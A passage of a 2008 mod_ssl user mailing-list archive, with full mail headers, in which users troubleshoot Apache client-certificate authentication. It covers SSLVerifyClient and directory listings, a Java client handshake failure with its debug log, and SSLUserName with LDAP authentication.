Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Message-Id: <200806270927.19351.f.hackenberger@chello.at>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Florian Hackenberger 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Friday 27 June 2008, Cuesta Gilles wrote:
> It's more an apache specific question; try setting
> Options +Indexes
> in your vhost, allowing directory listing.
Thanks, but that is certainly not the problem, as apache creates a 
listing as soon as I remove 'SSLVerifyClient require'.

Cheers,
	Florian

-- 
DI Florian Hackenberger
florian@hackenberger.at
www.hackenberger.at
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 27 10:25:52 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id BD5ED14DA64; Fri, 27 Jun 2008 10:25:52 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from fk-out-0910.google.com (fk-out-0910.google.com [209.85.128.185])
	by master.modssl.org (Postfix) with ESMTP id 07D7214D86E
	for ; Fri, 27 Jun 2008 10:25:50 +0200 (CEST)
Received: by fk-out-0910.google.com with SMTP id f40so409240fka.1
        for ; Fri, 27 Jun 2008 01:25:19 -0700 (PDT)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=gmail.com; s=gamma;
        h=domainkey-signature:received:received:message-id:date:from
         :user-agent:mime-version:to:subject:references:in-reply-to
         :x-enigmail-version:content-type;
        bh=HAfCJX+4XA6TD175YcTPdNgd/39p4D5dxwlQ/WCOF0M=;
        b=ODYIPFn2MK7UrWguqgIM6BZ/Fq0Gem/jlrZ26cOSvC5BqehdOLkEFDjRNlQXuJM4Is
         GFE7sdfDW9MoY/bcX5yzj41d/wXCQApCw1mjALB45qfIblX9n3PF8DJ2F+RV/9TzkI/8
         cBe7drVZwzxS1ijjOE6RrrFxGgqPorUP34BJ0=
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=gamma;
        h=message-id:date:from:user-agent:mime-version:to:subject:references
         :in-reply-to:x-enigmail-version:content-type;
        b=oFtF7UAUvL63Vy9y1RD1w0/L/35LQo9eMqTXE99IAw96EXYuiKQdJ786lYK3nxai25
         LLKvBm2gD4E4OlYMwjB6vP8ago2zVl9Q6LDEWmMPafJso4lSbTflEoAF85JNFbqmMTrz
         v3WZHU2xyzbfT6EDMzcZ0Nu7y6BOgMLkMurbE=
Received: by 10.125.88.8 with SMTP id q8mr249472mkl.88.1214555118974;
        Fri, 27 Jun 2008 01:25:18 -0700 (PDT)
Received: from ?192.168.12.138? ( [213.41.232.32])
        by mx.google.com with ESMTPS id g28sm2882407fkg.8.2008.06.27.01.25.17
        (version=TLSv1/SSLv3 cipher=RC4-MD5);
        Fri, 27 Jun 2008 01:25:18 -0700 (PDT)
Message-ID: <4864A3EC.1050004@gmail.com>
Date: Fri, 27 Jun 2008 10:25:16 +0200
From: Cuesta Gilles 
User-Agent: Thunderbird 2.0.0.12 (X11/20080213)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: SSLVerifyClient applies to parent directory
References: <200806261755.45422.f.hackenberger@chello.at> <200806270840.43515.f.hackenberger@chello.at> <48649568.2080903@gmail.com> <200806270927.19351.f.hackenberger@chello.at>
In-Reply-To: <200806270927.19351.f.hackenberger@chello.at>
X-Enigmail-Version: 0.95.6
Content-Type: multipart/signed; micalg=pgp-sha1;
 protocol="application/pgp-signature";
 boundary="------------enigF2102C8B1FE228C6B7C0C17F"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cuesta Gilles 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is an OpenPGP/MIME signed message (RFC 2440 and 3156)
--------------enigF2102C8B1FE228C6B7C0C17F
Content-Type: text/plain; charset=ISO-8859-15; format=flowed
Content-Transfer-Encoding: quoted-printable

Florian Hackenberger a =E9crit :
> On Friday 27 June 2008, Cuesta Gilles wrote:
>  =20
>> It's more an apache specific question; try setting
>> Options +Indexes
>> in your vhost, allowing directory listing.
>>    =20
> Thanks, but that is certainly not the problem, as apache creates a=20
> listing as soon as I remove 'SSLVerifyClient require'.
>
> Cheers,
> 	Florian
>
>  =20
That seems to point that it's already activated.

For your issue, two questions:
- is a VerifyDepth 1 enough for verification chaining ?
- No default VerifyClient by default for VirtualHost
Try adding:

SSLVerifyClient none

or=20


       	SSLVerifyClient none


Listen 443

        SSLEngine On
        SSLCertificateFile /etc/apache2/ssl/acoveo.com.pem
        DocumentRoot "/usr/local/htdocs"

	SSLVerifyClient none

	
        	SSLVerifyClient require
	        SSLVerifyDepth 1
	


--=20
Chuck Norris comprend Lassie et Flipper le dauphin. C'est d'ailleurs lui =
qui =E0 r=E9alis=E9 les traductions dans l'int=E9gralit=E9 des =E9pisodes=
 !
Gilles CUESTA - Logiciels Libres
69139920



--------------enigF2102C8B1FE228C6B7C0C17F
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: OpenPGP digital signature
Content-Disposition: attachment; filename="signature.asc"

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFIZKPs545quQSHen8RArh4AKDE5GhQxCMN4D8rWH6RwCpH+a7byQCgysFn
HWMukDrO3hjVCtt3gIYQrx4=
=3gmd
-----END PGP SIGNATURE-----

--------------enigF2102C8B1FE228C6B7C0C17F--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 27 10:33:36 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 9DF6214DA64; Fri, 27 Jun 2008 10:33:36 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mail.acoveo.com (lancelot.acoveo.com [212.186.206.14])
	by master.modssl.org (Postfix) with ESMTP id 0580714D86E
	for ; Fri, 27 Jun 2008 10:33:33 +0200 (CEST)
Received: from hacki-mobile.internal.acoveo.com (unknown [10.241.85.96])
	by mail.acoveo.com (Postfix) with ESMTP id 8A70A18ADED
	for ; Fri, 27 Jun 2008 10:33:02 +0200 (CEST)
From: Florian Hackenberger 
To: modssl-users@modssl.org
Subject: Re: SSLVerifyClient applies to parent directory
Date: Fri, 27 Jun 2008 10:33:01 +0200
User-Agent: KMail/1.9.9
References: <200806261755.45422.f.hackenberger@chello.at> <200806270927.19351.f.hackenberger@chello.at> <4864A3EC.1050004@gmail.com>
In-Reply-To: <4864A3EC.1050004@gmail.com>
MIME-Version: 1.0
Content-Type: text/plain;
  charset="iso-8859-15"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Message-Id: <200806271033.02021.f.hackenberger@chello.at>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Florian Hackenberger 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Friday 27 June 2008, Cuesta Gilles wrote:
> For your issue, two questions:
> - is a VerifyDepth 1 enough for verification chaining ?
It is, however that is not relevant for the problem, because apache 
should not request a client certificate in the first place.

> - No default VerifyClient by default for VirtualHost
> Try adding:


I tried your suggestion, but it does not help unfortunately.

Cheers,
	Florian

-- 
DI Florian Hackenberger
florian@hackenberger.at
www.hackenberger.at
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 27 10:36:56 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id CFCE414DA68; Fri, 27 Jun 2008 10:36:56 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mx1.redhat.com (mx1.redhat.com [66.187.233.31])
	by master.modssl.org (Postfix) with ESMTP id 1400214DA64
	for ; Fri, 27 Jun 2008 10:36:55 +0200 (CEST)
Received: from int-mx1.corp.redhat.com (int-mx1.corp.redhat.com [172.16.52.254])
	by mx1.redhat.com (8.13.8/8.13.8) with ESMTP id m5R8aLlZ018748;
	Fri, 27 Jun 2008 04:36:21 -0400
Received: from turnip.manyfish.co.uk (vpn-12-127.rdu.redhat.com [10.11.12.127])
	by int-mx1.corp.redhat.com (8.13.1/8.13.1) with ESMTP id m5R8aKH6029611;
	Fri, 27 Jun 2008 04:36:21 -0400
Received: from jorton by turnip.manyfish.co.uk with local (Exim 4.69)
	(envelope-from )
	id 1KC9RM-0001VE-Fl; Fri, 27 Jun 2008 09:36:20 +0100
Date: Fri, 27 Jun 2008 09:36:20 +0100
From: Joe Orton 
To: Florian Hackenberger 
Cc: modssl-users@modssl.org
Subject: Re: SSLVerifyClient applies to parent directory
Message-ID: <20080627083620.GA4512@redhat.com>
Mail-Followup-To: Florian Hackenberger ,
	modssl-users@modssl.org
References: <200806261755.45422.f.hackenberger@chello.at> <20080626161215.GA19340@redhat.com> <200806261821.01812.f.hackenberger@chello.at> <200806270840.43515.f.hackenberger@chello.at>
MIME-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Disposition: inline
In-Reply-To: <200806270840.43515.f.hackenberger@chello.at>
User-Agent: Mutt/1.5.18 (2008-05-17)
Organization: Red Hat UK Ltd, Amberley Place, 107-111 Peascod Street, Windsor, Berkshire, SL4 1TE, United Kingdom.
  Registered in UK and Wales under Company Registration No. 03798903
  Directors: Michael Cunningham (USA), Brendan Lane (Ireland), Matt Parson (USA), Charlie Peters (USA)
X-Scanned-By: MIMEDefang 2.58 on 172.16.52.254
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joe Orton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Fri, Jun 27, 2008 at 08:40:43AM +0200, Florian Hackenberger wrote:
> On Thursday 26 June 2008, Florian Hackenberger wrote:
> > On Thursday 26 June 2008, Joe Orton wrote:
> > It denies access for what type of request, a directory listing?
> Ok, I think I understood the intention of your question. Accessing a 
> specific file works, but getting the directory listing fails. Would 
> that be a result of apache trying to access the protected directory in 
> oder to read attributes for the listing, causing the certificate 
> verification to kick in?

Yup.  Changing the "SSLVerifyClient require" to:

SSLVerifyClient optional
SSLRequire %{SSL_CLIENT_VERIFY} eq "SUCCESS"

might work around it; you'll still get a client cert request for the 
subrequest, but it should end in a 403 rather than terminating the SSL 
connection.  (That will cause the protected directory to disappear from 
the directory listing, unless you use "IndexOptions ShowForbidden")

Test this carefully though!

joe


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 27 10:51:34 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 8650514DA64; Fri, 27 Jun 2008 10:51:34 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mail.acoveo.com (lancelot.acoveo.com [212.186.206.14])
	by master.modssl.org (Postfix) with ESMTP id 5367814D86E
	for ; Fri, 27 Jun 2008 10:51:33 +0200 (CEST)
Received: from hacki-mobile.internal.acoveo.com (unknown [10.241.85.96])
	by mail.acoveo.com (Postfix) with ESMTP id DAA3218AE13
	for ; Fri, 27 Jun 2008 10:51:01 +0200 (CEST)
From: Florian Hackenberger 
To: modssl-users@modssl.org
Subject: Re: SSLVerifyClient applies to parent directory
Date: Fri, 27 Jun 2008 10:51:01 +0200
User-Agent: KMail/1.9.9
References: <200806261755.45422.f.hackenberger@chello.at> <200806270840.43515.f.hackenberger@chello.at> <20080627083620.GA4512@redhat.com>
In-Reply-To: <20080627083620.GA4512@redhat.com>
MIME-Version: 1.0
Content-Type: text/plain;
  charset="utf-8"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Message-Id: <200806271051.01340.f.hackenberger@chello.at>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Florian Hackenberger 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Friday 27 June 2008, Joe Orton wrote:
> Yup.  Changing the "SSLVerifyClient require" to:
> SSLVerifyClient optional
> SSLRequire %{SSL_CLIENT_VERIFY} eq "SUCCESS"

Thanks a lot! The workaround worked ;-). Please consider this issue 
solved.

I have another question: Has anyone successfully established a 
connection to an apache/mod_ssl server with client authentication using 
a java client? My client (code below) generates the following log 
(exception at the end) upon execution:

*** ServerHelloDone
*** Certificate chain
***
*** ClientKeyExchange, RSA PreMasterSecret, TLSv1
main, WRITE: TLSv1 Handshake, length = 157
SESSION KEYGEN:
PreMaster Secret:
0000: 03 01 71 CC D3 DC AF 35   A3 A2 70 1C E5 9A 06 
00  ..q....5..p.....
0010: 1F 8B 18 05 6E 55 69 4E   44 18 D2 E5 0A 57 FB 
D4  ....nUiND....W..
0020: 71 62 17 14 57 2A FE 8F   4D 5A CF 7A 82 09 31 8C  
qb..W*..MZ.z..1.
CONNECTION KEYGEN:
Client Nonce:
0000: 48 64 A7 92 45 15 E8 74   E3 75 A7 BD F7 E3 B8 82  
Hd..E..t.u......
0010: 94 D4 1E 75 ED 3D D3 41   0E 5F BA 12 ED 47 E6 
B1  ...u.=.A._...G..
Server Nonce:
0000: 48 64 A7 92 B5 6D 56 62   6D E3 7B 67 C7 08 78 13  
Hd...mVbm..g..x.
0010: 45 47 5A 93 18 62 D4 E5   75 25 A1 65 F8 DD 85 86  
EGZ..b..u%.e....
Master Secret:
0000: 0C 65 EA 1D A6 E6 FC 3C   AD AA 34 04 C6 82 81 
50  .e.....<..4....P
0010: 07 78 38 FC B6 04 77 3E   7E 90 BC 24 A9 D3 B1 86  .x8...w>...
$....
0020: F9 99 26 1A FD 08 9A C3   E0 32 43 D0 A1 59 21 5C  ..&......2C..Y!
\
Client MAC write Secret:
0000: D0 7D F1 90 58 AF 0B 43   F7 02 39 0C 0C B2 87 
C3  ....X..C..9.....
Server MAC write Secret:
0000: 5C AD 45 74 3D 58 96 FB   41 37 72 99 12 D5 BD 3A  
\.Et=X..A7r....:
Client write key:
0000: 38 AE 1A 7E 63 26 C7 7F   9D E2 74 9E D2 12 55 C9  
8...c&....t...U.
Server write key:
0000: 7E 57 BF 54 A7 74 D8 72   72 AC 18 B8 5F 2D F6 
06  .W.T.t.rr..._-..
... no IV used for this cipher
main, WRITE: TLSv1 Change Cipher Spec, length = 17
*** Finished
verify_data:  { 150, 113, 105, 3, 36, 96, 160, 52, 133, 8, 145, 137 }
***
main, WRITE: TLSv1 Handshake, length = 32
main, waiting for close_notify or alert: state 3
main, READ: TLSv1 Alert, length = 18
main, RECV TLSv1 ALERT:  fatal, handshake_failure
%% Invalidated:  [Session-3, SSL_RSA_WITH_RC4_128_MD5]
main, called closeSocket()
main, Exception while waiting for close 
javax.net.ssl.SSLHandshakeException: Received fatal alert: 
handshake_failure
main, handling exception: javax.net.ssl.SSLHandshakeException: Received 
fatal alert: handshake_failure
main, called close()
main, called closeInternal(true)
javax.net.ssl.SSLHandshakeException: Received fatal alert: 
handshake_failure
        at 
com.sun.net.ssl.internal.ssl.Alerts.getSSLException(Alerts.java:174)
        at 
com.sun.net.ssl.internal.ssl.Alerts.getSSLException(Alerts.java:136)
        at 
com.sun.net.ssl.internal.ssl.SSLSocketImpl.recvAlert(SSLSocketImpl.java:1657)
        at 
com.sun.net.ssl.internal.ssl.SSLSocketImpl.readRecord(SSLSocketImpl.java:932)
        at 
com.sun.net.ssl.internal.ssl.SSLSocketImpl.waitForClose(SSLSocketImpl.java:1435)
        at 
com.sun.net.ssl.internal.ssl.HandshakeOutStream.flush(HandshakeOutStream.java:103)
        at 
com.sun.net.ssl.internal.ssl.Handshaker.sendChangeCipherSpec(Handshaker.java:612)
        at 
com.sun.net.ssl.internal.ssl.ClientHandshaker.sendChangeCipherAndFinish(ClientHandshaker.java:808)
        at 
com.sun.net.ssl.internal.ssl.ClientHandshaker.serverHelloDone(ClientHandshaker.java:734)
        at 
com.sun.net.ssl.internal.ssl.ClientHandshaker.processMessage(ClientHandshaker.java:197)
        at 
com.sun.net.ssl.internal.ssl.Handshaker.processLoop(Handshaker.java:516)
        at 
com.sun.net.ssl.internal.ssl.Handshaker.process_record(Handshaker.java:454)
        at 
com.sun.net.ssl.internal.ssl.SSLSocketImpl.readRecord(SSLSocketImpl.java:884)
        at 
com.sun.net.ssl.internal.ssl.SSLSocketImpl.readDataRecord(SSLSocketImpl.java:746)
        at 
com.sun.net.ssl.internal.ssl.AppInputStream.read(AppInputStream.java:75)
        at 
java.io.BufferedInputStream.fill(BufferedInputStream.java:218)
        at java.io.BufferedInputStream.read1
(BufferedInputStream.java:258)
        at 
java.io.BufferedInputStream.read(BufferedInputStream.java:317)
        at 
sun.net.www.http.HttpClient.parseHTTPHeader(HttpClient.java:687)
        at sun.net.www.http.HttpClient.parseHTTP(HttpClient.java:632)
        at sun.net.www.http.HttpClient.parseHTTP(HttpClient.java:652)
        at 
sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1000)
        at 
com.sun.net.ssl.internal.www.protocol.https.HttpsURLConnectionOldImpl.getInputStream(HttpsURLConnectionOldImpl.java:204)
        at java.net.URL.openStream(URL.java:1009)
        at URLClient.main(URLClient.java:17)


The server logs the following error:
[error] Re-negotiation handshake failed: Not accepted by client!?

Has someone experience with java client verification or can someone 
formulate an educated guess what the problem could be? I have the 
cacert root certificate imported at the server side 
(SSLCACertificateFile), as well as the client side (within the trust 
store). The server, as well as the client certificate are issued by 
cacert. The server certificate is specified using SSLCertificateFile 
within the VirtualHost and the client certificate is stored within the 
key store. I can establish an https connection to the same host without 
client authentication, which leads to the assumption that the server 
certificate ca nbe verified by the java client.
	I have tried to find answers to the problem using google, but none were 
useful for the problem at hand.

Cheers,
	Florian



-- 
DI Florian Hackenberger
florian@hackenberger.at
www.hackenberger.at
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun 27 11:21:46 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 48FE414DA61; Fri, 27 Jun 2008 11:21:46 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mail.acoveo.com (lancelot.acoveo.com [212.186.206.14])
	by master.modssl.org (Postfix) with ESMTP id 377BA14D86E
	for ; Fri, 27 Jun 2008 11:21:44 +0200 (CEST)
Received: from hacki-mobile.internal.acoveo.com (unknown [10.241.85.96])
	by mail.acoveo.com (Postfix) with ESMTP id 9A37C18AE0F
	for ; Fri, 27 Jun 2008 11:21:13 +0200 (CEST)
From: Florian Hackenberger 
To: modssl-users@modssl.org
Subject: Re: SSLVerifyClient applies to parent directory
Date: Fri, 27 Jun 2008 11:21:12 +0200
User-Agent: KMail/1.9.9
References: <200806261755.45422.f.hackenberger@chello.at> <20080627083620.GA4512@redhat.com> <200806271051.01340.f.hackenberger@chello.at>
In-Reply-To: <200806271051.01340.f.hackenberger@chello.at>
MIME-Version: 1.0
Content-Type: text/plain;
  charset="utf-8"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Message-Id: <200806271121.13065.f.hackenberger@chello.at>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Florian Hackenberger 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Friday 27 June 2008, Florian Hackenberger wrote:
> I have another question: Has anyone successfully established a
> connection to an apache/mod_ssl server with client authentication
> using a java client? My client (code below) generates the following
> log (exception at the end) upon execution:

Sorry, please scrap my posting. I made an embarrassing mistake: Instead 
of exporting the client certificate including the public/private 
keypair from the browser and importing that into the keystore, I 
imported the certificate only, without the public/private keypair...

Thanks for your help once again!
	Florian

-- 
DI Florian Hackenberger
florian@hackenberger.at
www.hackenberger.at
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 30 18:23:48 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 99D8D14DA47; Mon, 30 Jun 2008 18:23:48 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from gv-out-0910.google.com (gv-out-0910.google.com [216.239.58.187])
	by master.modssl.org (Postfix) with ESMTP id 365FE14D847
	for ; Mon, 30 Jun 2008 18:23:47 +0200 (CEST)
Received: by gv-out-0910.google.com with SMTP id y18so168723gvf.27
        for ; Mon, 30 Jun 2008 09:23:15 -0700 (PDT)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=gmail.com; s=gamma;
        h=domainkey-signature:received:received:message-id:date:from:to
         :subject:mime-version:content-type;
        bh=EEi6N1fNrS+Kp3Yvl7Ek8GvZWf2Ou9VRC/JMh+Qj5x8=;
        b=m5Yk9cf6SZ+/XRdnIZHZFR2RwE3GA6euW6FgJAsqXjpJBFfUmtOt/l6C866P2OLJhB
         RVaLqGhQ/IGiTrn8JPw9bfSveeGq4ZjACI/P5XserLUxIyrwl797JQY6vjNHVBHIusr4
         QOq6bdkyX8SPbtrh8hKfmm55t/VKBXWtn6L4g=
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=gamma;
        h=message-id:date:from:to:subject:mime-version:content-type;
        b=pxr8nH41lu93KJulynftId0+GEp8SLjpvjoPcHPm3oZtDgJUWtAODa8zc5+wY3wx9J
         V7oDHOndau9fxKF02GbpKJ5LWeS3GAQ0LWsIlUg3DvJ4FJDZqJBzNYVcxkfKYKFiIfPe
         BHdVGzylEaa/rv18+JsSL1dNs/W3beDpXXBLc=
Received: by 10.103.22.11 with SMTP id z11mr2355043mui.106.1214842995148;
        Mon, 30 Jun 2008 09:23:15 -0700 (PDT)
Received: by 10.103.179.18 with HTTP; Mon, 30 Jun 2008 09:23:15 -0700 (PDT)
Message-ID: <96f2fc380806300923i624fd1cay214cc3035f108b1b@mail.gmail.com>
Date: Mon, 30 Jun 2008 18:23:15 +0200
From: "mdn teo" 
To: modssl-users@modssl.org
Subject: SSLusername
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_8104_12555214.1214842995140"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "mdn teo" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_8104_12555214.1214842995140
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Hi,

I'm working with mod_authnz_ldap, mod_ssl authenticating with certificates
and I've got some questions.
This is my situation (some directives are omitted)

------------------------------------------------------------------------------------------------
SSLVerifyClient require
SSLOptions +ExportCertData +StdEnvVars +StrictRequire +FakeBasicAuth


        SSLRequireSSL
        AuthType basic
        AuthName "private area"
        AuthzLDAPAuthoritative off
        AuthBasicProvider       ldap
        AuthLDAPBindDN          uid=myuser,dc=example,dc=com
        AuthLDAPBindPassword    mypassword
        AuthLDAPUrl             "
ldap://myldaphost:389/ou=users,dc=example,dc=com?subjectDN?sub?(objectclass=
*)"
        Require ldap-attribute employeeType=active

------------------------------------------------------------------------------------------------

This configuration is working, the user in found in LDAP searching for his
"subjectDN", as set by the option "+FakeBasicAuth", but I want to make the
LDAP SEARCH not with the subjectDN, but other fields of the certificate.

If I use these options:
------------------------------------------------------------------------------------------------
SSLVerifyClient require
 SSLUserName SSL_CLIENT_S_DN_CN
SSLOptions +ExportCertData +StdEnvVars +StrictRequire -FakeBasicAuth


        SSLRequireSSL
        AuthType basic
        AuthName "private area"
        AuthzLDAPAuthoritative off
        AuthBasicProvider       ldap
        AuthLDAPBindDN          uid=myuser,dc=example,dc=com
        AuthLDAPBindPassword    mypassword
        AuthLDAPUrl             "
ldap://myldaphost:389/ou=users,dc=example,dc=com?cn?sub?(objectclass=*)"
        Require ldap-attribute employeeType=active

------------------------------------------------------------------------------------------------

The mod_ssl does his work, as in my log files I see the "CN" logges as "%u",
but as soon as I call "/private", the "%u" becomes an empty variable and I
can't use it in the next authentication module.
Is there something I'm missing?

Second question is: is it possible to use Environment variables in the
directives AuthLDAPUrl, "require ldap-filter" or "require ldap-attribute"?
Something like this:
------------------------------------------------------------------------------------------------
AuthLDAPUrl             "
ldap://myldaphost:389/ou=users,dc=example,dc=com?subjectDN?sub?(mail=%{SSL_CLIENT_S_DN_Email
)"
or
Require ldap-filter
"(&(mail=%{SSL_CLIENT_S_DN_Email})(CN=%{SSL_CLIENT_S_DN_CN}))"
or
Require ldap-attribute mail=%{SSL_CLIENT_S_DN_Email}
------------------------------------------------------------------------------------------------

Last question is: As described in
http://httpd.apache.org/docs/2.2/mod/mod_ssl.html#ssloptions, regarding
"fakebasicauth", the password for the user must be set to "password", is it
strictly necessary? or is there a way to set a different password, or
verify issuerDN and subjectDN, against a fake password?

------=_Part_8104_12555214.1214842995140
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline


Hi, 

I'm working with mod_authnz_ldap, mod_ssl authenticating with certificates and I've got some questions.


This is my situation (some directives are omitted)


 


------------------------------------------------------------------------------------------------


SSLVerifyClient require


SSLOptions +ExportCertData +StdEnvVars +StrictRequire +FakeBasicAuth


 


<Location /private>


        SSLRequireSSL


        AuthType basic
        AuthName "private area"
        AuthzLDAPAuthoritative off


        AuthBasicProvider       ldap
        AuthLDAPBindDN          uid=myuser,dc=example,dc=com


        AuthLDAPBindPassword    mypassword


        AuthLDAPUrl             "ldap://myldaphost:389/ou=users,dc=example,dc=com?subjectDN?sub?(objectclass=*)"



        Require ldap-attribute employeeType=active


</Location>


------------------------------------------------------------------------------------------------


 


This configuration is working, the user in found in LDAP searching for his "subjectDN", as set by the option "+FakeBasicAuth", but I want to make the LDAP SEARCH not with the subjectDN, but other fields of the certificate. 



 


If I use these options:


------------------------------------------------------------------------------------------------


SSLVerifyClient require




SSLUserName SSL_CLIENT_S_DN_CN 


SSLOptions +ExportCertData +StdEnvVars +StrictRequire -FakeBasicAuth


 


<Location /private>


        SSLRequireSSL


        AuthType basic
        AuthName "private area"
        AuthzLDAPAuthoritative off


        AuthBasicProvider       ldap
        AuthLDAPBindDN          uid=myuser,dc=example,dc=com


        AuthLDAPBindPassword    mypassword


        AuthLDAPUrl             "ldap://myldaphost:389/ou=users,dc=example,dc=com?cn?sub?(objectclass=*)"


        Require ldap-attribute employeeType=active


</Location>


------------------------------------------------------------------------------------------------


 


The mod_ssl does his work, as in my log files I see the "CN" logges as "%u", but as soon as I call "/private", the "%u" becomes an empty variable and I can't use it in the next authentication module. 



Is there something I'm missing?  


 


Second question is: is it possible to use Environment variables in the directives AuthLDAPUrl, "require ldap-filter" or "require ldap-attribute"? 


Something like this:
------------------------------------------------------------------------------------------------ 



or


Require ldap-filter "(&(mail=%{SSL_CLIENT_S_DN_Email})(CN=%{SSL_CLIENT_S_DN_CN}))" 


or 


Require ldap-attribute mail=%{SSL_CLIENT_S_DN_Email}


------------------------------------------------------------------------------------------------


 


Last question is: As described in http://httpd.apache.org/docs/2.2/mod/mod_ssl.html#ssloptions, regarding "fakebasicauth", the password for the user must be set to "password", is it strictly necessary? or is there a way to set a different password, or verify issuerDN and subjectDN, against a fake password? 


------=_Part_8104_12555214.1214842995140--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 30 22:08:07 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id D274A14D9E7; Mon, 30 Jun 2008 22:08:06 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from frfcqmg011ix3r8.montpellier.mebs.ihost.com (mail2.aspaway.fr [129.35.163.230])
	by master.modssl.org (Postfix) with ESMTP id 6DCA414D847
	for ; Mon, 30 Jun 2008 22:08:02 +0200 (CEST)
Received: from frfcqws071ix328.infra.montpellier.mebs.ihost.com (frfcqws071ix328 [10.0.77.8])
	by frfcqmg011ix3r8.montpellier.mebs.ihost.com (8.12.11.20060308/8.12.11) with ESMTP id m5UK7PYW012340
	for ; Mon, 30 Jun 2008 22:07:27 +0200
Subject: Jean-Pierre Guilloteau est absent.
From: jpguilloteau@aspaway.fr
To: modssl-users@modssl.org
Message-ID: 
Date: Mon, 30 Jun 2008 22:02:54 +0200
X-MIMETrack: Serialize by Router on MES01ASP/SRV/ASPAWAY(Release 7.0.2|September 26, 2006) at
 06/30/2008 10:07:30 PM
MIME-Version: 1.0
Content-type: text/plain; charset=ISO-8859-1
Content-transfer-encoding: quoted-printable
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
